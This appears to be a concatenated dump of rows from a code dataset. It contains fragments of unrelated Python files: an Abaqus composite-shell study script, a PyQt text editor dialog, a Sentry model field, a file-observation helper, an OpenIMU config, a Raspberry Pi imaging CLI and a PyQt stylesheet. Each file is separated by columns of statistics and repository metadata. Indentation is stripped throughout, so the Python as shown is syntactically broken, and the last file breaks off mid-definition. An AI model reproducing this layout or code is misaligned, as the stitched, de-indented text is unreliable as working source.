# adding perturbation loads
i_model = i + num_params['pl']
if i_model < len(pl_table):
for j in range(imp_num['pl']):
theta = pl_table[0][j]
pt = pl_table[1][j]
pltotal = pl_table[i_model][j]
cc.impconf.add_pload(theta, pt, pltotal, step=pload_step)
#Adding constant buckle
i_model = i + num_params['cbi']
if i_model < len(cb_table):
for j in range(imp_num['cbi']):
theta = cb_table[0][j]
pt = cb_table[1][j]
cbtotal = cb_table[i_model][j]
cc.impconf.add_cb(theta, pt, cbtotal, step=pload_step)
# adding single buckles
i_model = i + num_params['d']
if i_model < len(d_table):
for j in range(imp_num['d']):
theta0 = d_table[0][j]
z0 = d_table[1][j]
a = d_table[2][j]
b = d_table[3][j]
wb = d_table[i_model][j]
cc.impconf.add_dimple(theta0, z0, a, b, wb)
# adding axisymmetrics
i_model = i + num_params['ax']
if i_model < len(ax_table):
for j in range(imp_num['ax']):
z0 = ax_table[0][j]
b = ax_table[1][j]
wb = ax_table[i_model][j]
cc.impconf.add_axisymmetric(z0, b, wb)
# adding linear buckling mode-shaped imperfections
i_model = i + num_params['lbmi']
if i_model < len(lbmi_table):
for j in range(imp_num['lbmi']):
mode = lbmi_table[0][j]
scaling_factor = lbmi_table[i_model][j]
cc.impconf.add_lbmi(mode, scaling_factor)
# adding cutouts
i_model = i + num_params['cut']
if i_model < len(cut_table):
for j in range(imp_num['cut']):
theta = cut_table[0][j]
pt = cut_table[1][j]
numel = cut_table[2][j]
d = cut_table[i_model][j]
cutout = cc.impconf.add_cutout(theta, pt, d,
numel_radial_edge=numel)
## adding ply piece imperfection
if ppi_enabled:
info = []
for row in ppi_table:
if row is False:
continue # False may be appended if there is only one row
keys = ['starting_position', 'rel_ang_offset', 'max_width', 'eccentricity']
try:
info.append(dict((key, float(row[i])) for i, key in enumerate(keys) if row[i] != ''))
except ValueError, e:
raise ValueError('Invalid non-numeric value in Ply Piece Imperfection table:' + e.message.split(':')[-1])
cc.impconf.add_ppi(info, ppi_extra_height)
# adding fiber fraction imperfection
i_model = i-1
if i_model < len(ffi_scalings):
global_sf, use_ti = ffi_scalings[i_model]
if global_sf == 0:
global_sf = None
if use_ti or (global_sf is not None):
cc.impconf.add_ffi(nominal_vf=kwargs['ffi_nominal_vf'],
E_matrix=kwargs['ffi_E_matrix'],
nu_matrix=kwargs['ffi_nu_matrix'],
use_ti=use_ti,
global_sf=global_sf)
std.add_cc(cc)
std.create_models(write_input_files=False)
def run_study(std_name, ncpus, use_job_stopper):
args = ['abaqus', 'python']
args.append(os.path.join(TMP_DIR, std_name,
'run_' + std_name + '.py'))
args.append('cpus={0:d}'.format(ncpus))
args.append('gui')
if use_job_stopper:
args.append('use_stopper')
run_cmd = ' '.join(args)
subprocess.Popen(run_cmd, shell=True)
def clean_output_folder(std_name):
stds = __main__.stds
if not std_name in stds.keys():
print('Study has not been created!')
print('')
return
std = stds[std_name]
cwd = os.getcwd()
os.chdir(std.output_dir)
try:
if os.name == 'nt':
os.system('move *.gaps ..')
os.system('del /q *.*')
os.system('move ..\*.gaps .')
else:
os.system('mv *.gaps ..')
os.system('rm *.*')
os.system('mv ..\*.gaps .')
except:
pass
os.chdir(cwd)
def save_study(std_name, params_from_gui):
stds = __main__.stds
if not std_name in stds.keys():
print('Study has not been created!')
print(' ')
return
std = stds[std_name]
std.params_from_gui = params_from_gui
std.save()
if not os.path.isdir(TMP_DIR):
os.makedirs(TMP_DIR)
os.chdir(TMP_DIR)
__main__.mdb.saveAs(pathName = std_name + '.cae')
print(r'The DESICOS study has been saved to "{0}.study".'.format(
os.path.join(std.tmp_dir, std_name)))
print(' ')
def load_study(std_name):
std = study.Study()
std.tmp_dir = TMP_DIR
std.name = std_name
std = std.load()
std_name = find_std_name(std_name)
__main__.stds[std_name] = std
__main__.openMdb(pathName = std_name + '.cae')
vpname = __main__.session.currentViewportName
__main__.session.viewports[vpname].setValues(displayedObject = None)
mdb = __main__.mdb
if std.ccs[0].model_name in mdb.models.keys():
mod = mdb.models[std.ccs[0].model_name]
p = mod.parts['Shell']
__main__.session.viewports[vpname].setValues(displayedObject = p)
a = mod.rootAssembly
a.regenerate()
for cc in std.ccs:
if not cc.model_name in mdb.models.keys():
print('Could not load objects for model {0}!'.format(
cc.model_name))
continue
abaqus_functions.set_colors_ti(cc)
def get_new_key(which, key, value):
# Given a DB key and value
# Check whether value is already in the DB, if not add it
# and return a key that can be used to reference to 'value'
value = tuple(value) # Convert list to tuple, if needed
existing = fetch(which)
# Inverse mapping. Sorting keeps result reliable if there are duplicated values.
inv_existing = dict((v, k) for k, v in sorted(existing.iteritems(), reverse=True))
if key in existing and existing[key] == value:
# Key already exists and with the correct value, reuse it
return key
if value in inv_existing:
# There is already a name for this value in the DB, use it
return str(inv_existing[value])
# Find a new (not yet used) name and save in the DB
new_key = key
i = 1
while new_key in existing:
new_key = '{0}_{1:04d}'.format(key, i)
i += 1
save(which, new_key, value)
return new_key
def reconstruct_params_from_gui(std):
# First cc is often a linear one, so use the last cc as 'template'
# XX - it is assumed that all other ccs use the same parameters
cc = std.ccs[-1]
params = {}
for attr in ccattrs:
if attr in ('laminapropKeys', 'allowables', 'stack', 'plyts',
'damping_factor1', 'damping_factor2'):
continue
value = getattr(cc, attr)
params[attr] = value
# Set artificial_dampingX and damping_factorX manually
damping_attrs = [('damping_factor1', 'artificial_damping1'),
('damping_factor2', 'artificial_damping2')]
for damp_attr, art_attr in damping_attrs:
value = getattr(cc, damp_attr)
params[damp_attr] = value if (value is not None) else 0.
params[art_attr] = value is not None
# Prevent the GUI from complaining about unset parameters
for attr in ('axial_load', 'axial_displ', 'pressure_load'):
if params[attr] is None:
params[attr] = 0
# Set laminate properties
if not (len(cc.laminaprops) == len(cc.stack) == len(cc.plyts) ==
len(cc.laminapropKeys)):
raise ValueError('Loaded ConeCyl object has inconsistent stack length!')
laminapropKeys = []
for key, value in zip(cc.laminapropKeys, cc.laminaprops):
laminapropKeys.append(get_new_key('laminaprops', key, value))
params['laminapropKey'] = laminapropKeys[0]
# allowableKey is not saved, so reuse laminapropKey for the name
# TODO: Per-ply allowables
params['allowablesKey'] = get_new_key('allowables',
cc.laminapropKeys[0], cc.allowables[0])
# Construct laminate table
# import here to avoid circular reference
from testDB import NUM_PLIES, MAX_MODELS
tmp = np.empty((NUM_PLIES, 3), dtype='|S50')
tmp.fill('')
tmp[:len(laminapropKeys),0] = laminapropKeys
tmp[:len(cc.plyts),1] = cc.plyts
tmp[:len(cc.stack),2] = cc.stack
params['laminate'] = ','.join(['('+','.join(i)+')' for i in tmp])
# Apply perturbation loads
# TODO: other imperfections
all_ploads = list(chain.from_iterable(cci.impconf.ploads for cci in std.ccs))
all_ploads = map(lambda pl: (pl.thetadeg, pl.pt), all_ploads)
# Filter duplicates, to obtain a list of unique pload parameter combinations
seen = set()
all_ploads = [x for x in all_ploads if not (x in seen or seen.add(x))]
params['pl_num'] = len(all_ploads)
nonlinear_ccs = filter(lambda cci: not cci.linear_buckling, std.ccs)
# TODO: unduplicate magic numbers (here, in create_study and in testDB)
# It'll only get worse when adding other imperfections as well
if params['pl_num'] > 32:
raise ValueError('Too many different perturbation load parameters')
if len(nonlinear_ccs) > MAX_MODELS:
raise ValueError('Too many different models')
tmp = np.empty((len(nonlinear_ccs) + 3, 32), dtype='|S50')
tmp.fill('')
tmp[0,:len(all_ploads)] = [thetadeg for thetadeg, pt in all_ploads]
tmp[1,:len(all_ploads)] = [pt for thetadeg, pt in all_ploads]
for row, cci in enumerate(nonlinear_ccs, start=3):
for pl in cci.impconf.ploads:
assert (pl.thetadeg, pl.pt) in all_ploads
tmp[row,all_ploads.index((pl.thetadeg, pl.pt))] = pl.pltotal
params['pl_table'] = ','.join(['('+','.join(i)+')' for i in tmp])
# Apply PPI
ppi = cc.impconf.ppi
if ppi is not None:
params['ppi_enabled'] = True
params['ppi_extra_height'] = ppi.extra_height
tmp = np.empty((len(ppi.info), 4), dtype='|S50')
keys = ['starting_position', 'rel_ang_offset', 'max_width', 'eccentricity']
for i, info_dict in enumerate(ppi.info):
tmp[i,:] = [str(info_dict.get(key, '')) for key in keys]
params['ppi_table'] = ','.join(['('+','.join(i)+')' for i in tmp])
else:
params['ppi_table'] = ''
# Apply FFI
ffi = cc.impconf.ffi
if ffi is not None:
params['ffi_nominal_vf'] = ffi.nominal_vf
params['ffi_E_matrix'] = ffi.E_matrix
params['ffi_nu_matrix'] = ffi.nu_matrix
ffi_scalings = []
for cci in nonlinear_ccs:
ffi = cci.impconf.ffi
if ffi is None:
ffi_scalings.append((0, False))
else:
sf = ffi.global_sf if ffi.global_sf is not None else 0
ffi_scalings.append((sf, ffi.use_ti))
params['ffi_scalings'] = ','.join(str(s) for s in ffi_scalings)
else:
params['ffi_scalings'] = ''
# MSI, TI
for imp_type in ('ms', 't'):
imps = getattr(cc.impconf, imp_type + 'is')
if len(imps) == 0:
params['imp_{0}_scalings'.format(imp_type)] = ''
continue
imp = imps[0]
params['imp_{0}_theta_z_format'.format(imp_type)] = imp.use_theta_z_format
params['imp_{0}_stretch_H'.format(imp_type)] = imp.stretch_H
params['imp_{0}_ncp'.format(imp_type)] = imp.ncp
params['imp_{0}_power_parameter'.format(imp_type)] = imp.power_parameter
# rotatedeg seems not yet implemented in GUI ?!
# params['imp_{0}_rotatedeg'.format(imp_type)] = imp.rotatedeg
name_attr = 'imp_ms' if imp_type == 'ms' else 'imp_thick'
params[name_attr] = getattr(imp, name_attr)
if imp_type == 'ms':
params['imp_r_TOL'] = imp.r_TOL
else:
params['imp_num_sets'] = imp.number_of_sets
# If there are multiple TIs / MSIs, we are out of luck
scalings = []
for cci in nonlinear_ccs:
cci_imps = getattr(cci.impconf, imp_type + 'is')
def filter_imps(impi):
return getattr(impi, name_attr) == getattr(imp, name_attr)
cci_imps = filter(filter_imps, cci_imps)
scalings.append(0 if len(cci_imps) == 0 else cci_imps[0].scaling_factor)
scalings = ','.join(str(s) for s in scalings)
params['imp_{0}_scalings'.format(imp_type)] = scalings
params['std_name'] = std.name
std.params_from_gui = params
def load_study_gui(std_name, form):
std = study.Study()
std.tmp_dir = TMP_DIR
std.name = std_name
std = std.load()
saved_from_gui = len(std.params_from_gui) != 0
if not saved_from_gui:
reconstruct_params_from_gui(std)
form.setDefault()
form.read_params_from_gui(std.params_from_gui)
return saved_from_gui
| 36.96796 | 125 | 0.593194 | 2,978 | 21,922 | 4.121894 | 0.156145 | 0.02224 | 0.011405 | 0.008065 | 0.217352 | 0.154542 | 0.11609 | 0.075275 | 0.060448 | 0.051976 | 0 | 0.009255 | 0.290211 | 21,922 | 592 | 126 | 37.030405 | 0.779627 | 0.099033 | 0 | 0.166667 | 0 | 0 | 0.114312 | 0.00442 | 0.006173 | 0 | 0 | 0.001689 | 0.002058 | 0 | null | null | 0.004115 | 0.028807 | null | null | 0.016461 | 0 | 0 | 0 | null | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | null | 0 | 0 | 0 | 0 | 1 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 1 |
d3230aebfb6ec10341841fb4d94700228d875338 | 2,277 | py | Python | pydeelib/widgets/texteditor.py | pombreda/pydee | 133609d4e378361d968e7a06baa11256e0e2f403 | [
"MIT"
] | null | null | null | pydeelib/widgets/texteditor.py | pombreda/pydee | 133609d4e378361d968e7a06baa11256e0e2f403 | [
"MIT"
] | null | null | null | pydeelib/widgets/texteditor.py | pombreda/pydee | 133609d4e378361d968e7a06baa11256e0e2f403 | [
"MIT"
] | null | null | null | # -*- coding: utf-8 -*-
#
# Copyright © 2009 Pierre Raybaut
# Licensed under the terms of the MIT License
# (see pydeelib/__init__.py for details)
"""
Text Editor Dialog based on PyQt4
"""
# pylint: disable-msg=C0103
# pylint: disable-msg=R0903
# pylint: disable-msg=R0911
# pylint: disable-msg=R0201
from PyQt4.QtCore import Qt
from PyQt4.QtCore import SIGNAL, SLOT
from PyQt4.QtGui import QVBoxLayout, QTextEdit, QDialog, QDialogButtonBox
# Local import
from pydeelib.config import get_icon, get_font
class TextEditor(QDialog):
"""Array Editor Dialog"""
def __init__(self, text, title='', font=None, parent=None):
super(TextEditor, self).__init__(parent)
self.layout = QVBoxLayout()
self.setLayout(self.layout)
# Text edit
self.edit = QTextEdit(parent)
self.edit.setPlainText(text)
if font is None:
font = get_font('texteditor')
self.edit.setFont(font)
self.layout.addWidget(self.edit)
# Buttons configuration
bbox = QDialogButtonBox(QDialogButtonBox.Ok | QDialogButtonBox.Cancel )
self.connect(bbox, SIGNAL("accepted()"), SLOT("accept()"))
self.connect(bbox, SIGNAL("rejected()"), SLOT("reject()"))
self.layout.addWidget(bbox)
# Make the dialog act as a window
self.setWindowFlags(Qt.Window)
self.setWindowIcon(get_icon('edit.png'))
self.setWindowTitle(self.tr("Text editor") + \
"%s" % (" - "+str(title) if str(title) else ""))
self.resize(400, 300)
def get_copy(self):
"""Return modified text"""
return unicode(self.edit.toPlainText())
def main():
"""Text editor demo"""
from PyQt4.QtGui import QApplication
QApplication([])
dialog = TextEditor("""
01234567890123456789012345678901234567890123456789012345678901234567890123456789
dedekdh elkd ezd ekjd lekdj elkdfjelfjk e
""")
if dialog.exec_():
text = dialog.get_copy()
print "Accepted:", text
dialog = TextEditor(text)
dialog.exec_()
else:
print "Canceled"
if __name__ == "__main__":
main() | 29.960526 | 85 | 0.611331 | 242 | 2,277 | 5.640496 | 0.466942 | 0.029304 | 0.046886 | 0.030769 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0.067674 | 0.273166 | 2,277 | 76 | 86 | 29.960526 | 0.756495 | 0.139218 | 0 | 0 | 0 | 0 | 0.131399 | 0.045506 | 0 | 0 | 0 | 0 | 0 | 0 | null | null | 0 | 0.119048 | null | null | 0.047619 | 0 | 0 | 0 | null | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | null | 0 | 0 | 0 | 0 | 1 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 1 |
d3256dbf7b293bf8be691bd30c05059ca559be89 | 685 | py | Python | src/sentry/db/models/fields/foreignkey.py | withrocks/commonlims | d8a925c917aa26e8205fefb3966a9f49f8f2e2f8 | [
"BSD-3-Clause"
] | 4 | 2019-05-27T13:55:07.000Z | 2021-03-30T07:05:09.000Z | src/sentry/db/models/fields/foreignkey.py | withrocks/commonlims | d8a925c917aa26e8205fefb3966a9f49f8f2e2f8 | [
"BSD-3-Clause"
] | 99 | 2019-05-20T14:16:33.000Z | 2021-01-19T09:25:15.000Z | src/sentry/db/models/fields/foreignkey.py | withrocks/commonlims | d8a925c917aa26e8205fefb3966a9f49f8f2e2f8 | [
"BSD-3-Clause"
] | 1 | 2020-08-10T07:55:40.000Z | 2020-08-10T07:55:40.000Z | """
sentry.db.models.fields.foreignkey
~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~
:copyright: (c) 2010-2014 by the Sentry Team, see AUTHORS for more details.
:license: BSD, see LICENSE for more details.
"""
from __future__ import absolute_import
from django.db.models import ForeignKey
__all__ = ('FlexibleForeignKey', )
class FlexibleForeignKey(ForeignKey):
def db_type(self, connection):
# This is required to support BigAutoField (or anything similar)
rel_field = self.target_field
if hasattr(rel_field, 'get_related_db_type'):
return rel_field.get_related_db_type(connection)
return super(FlexibleForeignKey, self).db_type(connection)
| 29.782609 | 75 | 0.70073 | 83 | 685 | 5.53012 | 0.590361 | 0.052288 | 0.061002 | 0.078431 | 0.104575 | 0.104575 | 0 | 0 | 0 | 0 | 0 | 0.014035 | 0.167883 | 685 | 22 | 76 | 31.136364 | 0.791228 | 0.372263 | 0 | 0 | 0 | 0 | 0.087678 | 0 | 0 | 0 | 0 | 0 | 0 | 1 | 0.111111 | false | 0 | 0.222222 | 0 | 0.666667 | 0 | 0 | 0 | 0 | null | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | null | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 1 | 0 | 0 | 1 |
d32a4aebc5975eb5e4c7cdb76bcd29f0483434fb | 3,235 | py | Python | pybond/bond/bond_helpers/observe_files.py | necula01/bond | 7ac262bc9695ba493985c784999509dec979e37a | [
"BSD-2-Clause-FreeBSD"
] | 8 | 2015-11-19T01:14:08.000Z | 2017-06-16T11:21:16.000Z | pybond/bond/bond_helpers/observe_files.py | gnecula/bond | 7ac262bc9695ba493985c784999509dec979e37a | [
"BSD-2-Clause-FreeBSD"
] | 26 | 2015-10-12T21:31:13.000Z | 2017-04-11T13:57:33.000Z | pybond/bond/bond_helpers/observe_files.py | gnecula/bond | 7ac262bc9695ba493985c784999509dec979e37a | [
"BSD-2-Clause-FreeBSD"
] | 3 | 2015-10-30T01:12:10.000Z | 2016-03-26T16:58:17.000Z | # Helper functions to observe files and directories
import os
import re
def collect_directory_contents(directory,
file_filter=None,
collect_file_contents=False):
"""
Collect an object reflecting the contents of a directory
:param directory: the directory where to start the traversal
:param file_filter: either a string representing a regular expression on the name of the files
and directories to be included, or a function that given the directory and the filename
returns true or false, whether the directory or file should be included.
:param collect_file_contents: indicates whether to collect the contents of files.
True means to include contents of all files,
:return: a dictionary with keys corresponding to basename of files and subdirectories.
Only files that are allowed by the file_filter are included.
If the file contents is collected then the dictionary contains a list of lines.
"""
# TODO: figure out a more general form for this, perhaps using
# a configurable visitor to define how to visit each file
result = { } # map from file name to file data.
# file data is either None (if the contents is not spied),
# or an array of lines
# Prepare the file filter
file_filter_func = None
if file_filter:
if isinstance(file_filter, basestring):
file_filter_regexp = re.compile(file_filter)
file_filter_func = lambda rel_file: file_filter_regexp.match(rel_file)
else:
# TODO: assert that it is a function
file_filter_func = file_filter
collect_file_contents_func = None
if collect_file_contents:
if isinstance(collect_file_contents, bool):
if collect_file_contents:
collect_file_contents_func = lambda rel_file: True
elif isinstance(collect_file_contents, basestring):
include_file_contents_regexp = re.compile(collect_file_contents)
collect_file_contents_func = lambda rel_file: include_file_contents_regexp.match(rel_file)
else:
# TODO: assert that it is a function
collect_file_contents_func = collect_file_contents
def recurse(rel_subdir, result_data):
name_subdir = os.path.join(directory, rel_subdir)
for basename in os.listdir(name_subdir):
rel_file = os.path.join(rel_subdir, basename)
file = os.path.join(directory, rel_file)
if file_filter_func and not file_filter_func(rel_file):
continue
if os.path.isdir(file):
subresult_data = {}
result_data[basename] = subresult_data
recurse(rel_file, subresult_data)
else:
if collect_file_contents_func and collect_file_contents_func(rel_file):
with open(file, 'r') as f:
lines = f.readlines ()
result_data[basename] = [l.rstrip() for l in lines ]
else:
result_data[basename] = None
recurse('', result)
return result
| 44.930556 | 102 | 0.646677 | 410 | 3,235 | 4.895122 | 0.295122 | 0.101644 | 0.132536 | 0.068759 | 0.149477 | 0.103637 | 0.103637 | 0.103637 | 0.103637 | 0.103637 | 0 | 0 | 0.302628 | 3,235 | 71 | 103 | 45.56338 | 0.889628 | 0.352396 | 0 | 0.139535 | 0 | 0 | 0.000491 | 0 | 0 | 0 | 0 | 0.014085 | 0 | 1 | 0.046512 | false | 0 | 0.046512 | 0 | 0.116279 | 0 | 0 | 0 | 0 | null | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | null | 0 | 0 | 1 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 1 |
d32db38b32c9c1c912fe1cbdd41b39ddaa026dbb | 437 | py | Python | src/aceinna/devices/configs/openimu_predefine.py | LukaszChl/ros_openimu | 1bcf547fa42ee7c7dcc856c1d4eb5702d301b059 | [
"Apache-2.0"
] | 6 | 2021-03-18T16:18:53.000Z | 2022-01-18T15:32:15.000Z | src/aceinna/devices/configs/openimu_predefine.py | LukaszChl/ros_openimu | 1bcf547fa42ee7c7dcc856c1d4eb5702d301b059 | [
"Apache-2.0"
] | 11 | 2020-12-22T16:19:20.000Z | 2022-02-11T11:03:25.000Z | src/aceinna/devices/configs/openimu_predefine.py | LukaszChl/ros_openimu | 1bcf547fa42ee7c7dcc856c1d4eb5702d301b059 | [
"Apache-2.0"
] | 11 | 2021-04-12T03:00:28.000Z | 2022-03-25T19:53:43.000Z | """
predefined params for openimu
"""
JSON_FILE_NAME = 'openimu.json'
def get_app_names():
'''
define openimu app type
'''
app_names = ['Compass',
'IMU',
'INS',
'Leveler',
'OpenIMU',
'VG',
'VG_AHRS',
]
return app_names
APP_STR = ['INS', 'VG', 'VG_AHRS', 'Compass', 'Leveler', 'IMU', 'OpenIMU']
| 19 | 74 | 0.434783 | 40 | 437 | 4.525 | 0.525 | 0.132597 | 0.088398 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0.414188 | 437 | 22 | 75 | 19.863636 | 0.707031 | 0.121281 | 0 | 0 | 0 | 0 | 0.232687 | 0 | 0 | 0 | 0 | 0 | 0 | 1 | 0.083333 | false | 0.166667 | 0 | 0 | 0.166667 | 0 | 0 | 0 | 0 | null | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | null | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 1 | 0 | 0 | 0 | 0 | 0 | 1 |
d331cf8fdbde34709011fa6dbc66e215380c30c3 | 4,650 | py | Python | src/bake_a_py/cli.py | derSuessmann/bake-a-py | 1fd2a0a4fa473215b44d2718755c5994a5588343 | [
"MIT"
] | null | null | null | src/bake_a_py/cli.py | derSuessmann/bake-a-py | 1fd2a0a4fa473215b44d2718755c5994a5588343 | [
"MIT"
] | null | null | null | src/bake_a_py/cli.py | derSuessmann/bake-a-py | 1fd2a0a4fa473215b44d2718755c5994a5588343 | [
"MIT"
] | null | null | null | import sys
import traceback
import click
from . import imaging_utility as iu
from . import provisioning
from . import __version__
def eprint(msg, show):
if show:
traceback.print_exc()
print(file=sys.stderr)
click.echo(msg, file=sys.stderr)
@click.group()
@click.version_option(__version__)
@click.option('--traceback', is_flag=True,
help='Show the full python exception if an error occurs.')
@click.pass_context
def cli(ctx, traceback):
ctx.ensure_object(dict)
ctx.obj['TRACEBACK'] = traceback
@cli.command()
@click.option('--hidden/--plain', default=True,
help='Hide or show password input.')
@click.pass_context
def create(ctx, hidden):
"""Create a provisioning configuration."""
try:
provisioning.create(hidden)
except Exception as exc:
eprint(f'Creating provisioning configuration failed ({exc}).',
ctx.obj['TRACEBACK'])
@cli.command()
@click.argument('os')
@click.option('--image-cache',
type=click.Path(file_okay=False),
default='~/.cache/bake-a-py',
help='Path where the downloaded image is stored.')
@click.option('-o', '--output',
help='Device path to write the OS image to.')
@click.option('--chksum/--no-chksum', '-c/ ', default=False,
help='Check the checksum of the OS image before writing.')
@click.option('--target', '-t',
help='Name of the configuration file.')
@click.option('--become', '-b', is_flag=True,
help='Run the writing of the image as super user.')
@click.option('--remove', '-r', is_flag=True,
help='Remove the image file after writing.')
@click.option('--keep', '-k', is_flag=True,
help='Keep the downloaded archive.')
@click.option('--encrypted/--decrypted', ' /-d', default=True,
help='Force usage of encrypted or decrypted provisioning configuration.')
@click.pass_context
def write(ctx, os, image_cache, output, chksum, target, become, remove, keep,
encrypted):
"""Write the image.
OS is the image name (one of the results of the list command).
This command download, extracts, checks integrity, writes and provisions
if neccessary.
"""
try:
iu.write(os, image_cache, output, target, chksum, become, remove, keep,
encrypted)
except Exception as exc:
eprint(f'Writing failed ({exc}).',
ctx.obj['TRACEBACK'])
@cli.command()
@click.argument('target')
@click.option('-o', '--output',
help='Device path to write the OS image to.')
@click.option('--encrypted/--decrypted', ' /-d', default=True,
help='Force usage of encrypted or decrypted provisioning configuration.')
@click.pass_context
def provision(ctx, target, output, encrypted):
"""Provision the os on OUTPUT for TARGET.
TARGET is the name of the configuration file.
"""
try:
iu.provision(target, output, encrypted)
except Exception as exc:
eprint(f'Provisioning failed ({exc}).',
ctx.obj['TRACEBACK'])
@cli.command()
@click.argument('device')
@click.pass_context
def mount(ctx, device):
"""Mount all partitions on DEVICE."""
try:
iu.udisks2.mount(device)
except Exception as exc:
eprint(f'Mounting {device} failed ({exc}).',
ctx.obj['TRACEBACK'])
@cli.command()
@click.argument('device')
@click.pass_context
def unmount(ctx, device):
"""Unmount all partitions on DEVICE."""
try:
iu.udisks2.unmount(device)
except Exception as exc:
eprint(f'Unmounting {device} failed ({exc}).',
ctx.obj['TRACEBACK'])
@cli.command()
@click.option('-a', '--all', is_flag=True,
help='All available images (not only Raspberry Pi OS images).')
@click.pass_context
def list(ctx, all):
"""List available OS images."""
try:
if all:
result = iu.get_all_images()
else:
result = iu.get_raspios_flavors()
click.echo('\n'.join(result))
except Exception as exc:
eprint(f'Listing OS images failed ({exc}).',
ctx.obj['TRACEBACK'])
@cli.command()
@click.option('--verbose', '-v', is_flag=True,
help='Show the complete description of the os image.')
@click.argument('name')
@click.pass_context
def describe(ctx, name, verbose):
"""Display the description of the OS image NAME.
"""
try:
desc = iu.get_image_description(name)
if verbose:
click.echo(desc)
else:
click.echo(desc['description'])
except Exception as exc:
eprint(f'Displaying description of {name} failed ({exc}).',
ctx.obj['TRACEBACK'])
if __name__ == '__main__':
cli(obj={}) | 31 | 79 | 0.641505 | 596 | 4,650 | 4.932886 | 0.248322 | 0.052381 | 0.043537 | 0.051701 | 0.39932 | 0.347619 | 0.305782 | 0.236395 | 0.236395 | 0.169728 | 0 | 0.000545 | 0.210108 | 4,650 | 150 | 80 | 31 | 0.799891 | 0.093548 | 0 | 0.4 | 0 | 0 | 0.287747 | 0.011095 | 0 | 0 | 0 | 0 | 0 | 1 | 0.075 | false | 0.075 | 0.05 | 0 | 0.125 | 0.083333 | 0 | 0 | 0 | null | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | null | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 1 | 0 | 0 | 0 | 0 | 0 | 1 |
d3356a95eb136cde9fb2ff5f5c78c32c6a43c33c | 7,264 | py | Python | scellseg/guis/scellsegGui.py | cellimnet/scellseg-publish | 03bfbae11fedcf430c40419c9afadf55cbd3034d | [
"BSD-3-Clause"
] | 1 | 2022-03-04T01:55:40.000Z | 2022-03-04T01:55:40.000Z | scellseg/guis/scellsegGui.py | cellimnet/scellseg-publish | 03bfbae11fedcf430c40419c9afadf55cbd3034d | [
"BSD-3-Clause"
] | null | null | null | scellseg/guis/scellsegGui.py | cellimnet/scellseg-publish | 03bfbae11fedcf430c40419c9afadf55cbd3034d | [
"BSD-3-Clause"
] | null | null | null | # -*- coding: utf-8 -*-
# Form implementation generated from reading ui file 'cellPoseUI.ui'
# Created by: PyQt5 UI code generator 5.11.3
import os, platform, ctypes, sys
from PyQt5 import QtWidgets
from PyQt5.QtCore import Qt
from PyQt5.QtGui import QFontDatabase
from scellseg.guis.scellsegUi import Ui_MainWindow
class scellsegGui(Ui_MainWindow):
def __init__(self, image=None, parent = None):
super(scellsegGui, self).__init__(parent)
self.setupUi(self)
self.splitter.setSizes([500, 250])
self.splitter.handle(1).setAttribute(Qt.WA_Hover, True)
self.splitter2.handle(1).setAttribute(Qt.WA_Hover, True)
def closeEvent(self, event):
answer = QtWidgets.QMessageBox.question(self, 'Close', 'Close Scellseg',
QtWidgets.QMessageBox.Yes |
QtWidgets.QMessageBox.No, QtWidgets.QMessageBox.No)
if answer == QtWidgets.QMessageBox.Yes:
event.accept()
elif answer == QtWidgets.QMessageBox.No:
event.ignore()
def start_gui():
Translucent = 'rgba(255,255,255,0)'
Primary = '#fafafa'
PrimaryLight = '#C0C0C0'
ListColor = '#F0F0F0'
SliderColor = '#0078D7'
LabelColor = '#7A581E'
BlackColor = '#000000'
BtnColor = '#0066FF'
Secondary = '#D3D3D3'
SecondaryLight = '#D3D3D3'
SecondaryDark = '#D3D3D3'
SecondaryText = '#000000'
border_image_path = os.path.dirname(os.path.abspath(__file__)).replace('\\', '/') + '/assets/slider_handle.png'
sheet = [
'QWidget',
'{',
'outline: 0;',
'font: 11pt "文泉驿微米黑";',
'selection-color: {0:s};'.format(SecondaryText),
'selection-background-color: {0:s};'.format(Secondary),
' } ',
'QSlider::handle:horizontal#rangeslider'
'{',
'border-image: url({0:s});'.format(border_image_path),
'}',
'QLabel#label_seg',
'{',
'color: {0:s};'.format(LabelColor),
'font: bold 18px "Arial"',
'}',
'QLabel#label_batchseg',
'{',
'color: {0:s};'.format(LabelColor),
'font: bold 18px "Arial"',
'}',
'QLabel#label_getsingle',
'{',
'color: {0:s};'.format(LabelColor),
'font: bold 18px "Arial"',
'}',
'QSplitter::handle:horizontal',
'{',
'width: 10px;',
'}',
'QSplitter::handle:vertical',
'{',
'height: 10px;',
'}',
'QSplitter::handle',
'{',
'background-color: {0:s};'.format(Translucent),
'}',
'QSplitter::handle:hover',
'{',
'background-color: {0:s};'.format(Secondary),
'}',
'QSplitter::handle:pressed',
'{',
'background-color: {0:s};'.format(Secondary),
'}',
'QTableView',
'{',
'background-color: {0:s};'.format(ListColor),
'border-style: none;',
'}',
'QHeaderView',
'{',
'background-color: {0:s};'.format(Translucent),
'border-bottom: 2px solid #505050',
'}',
'QHeaderView::section',
'{',
'background-color: {0:s};'.format(Translucent),
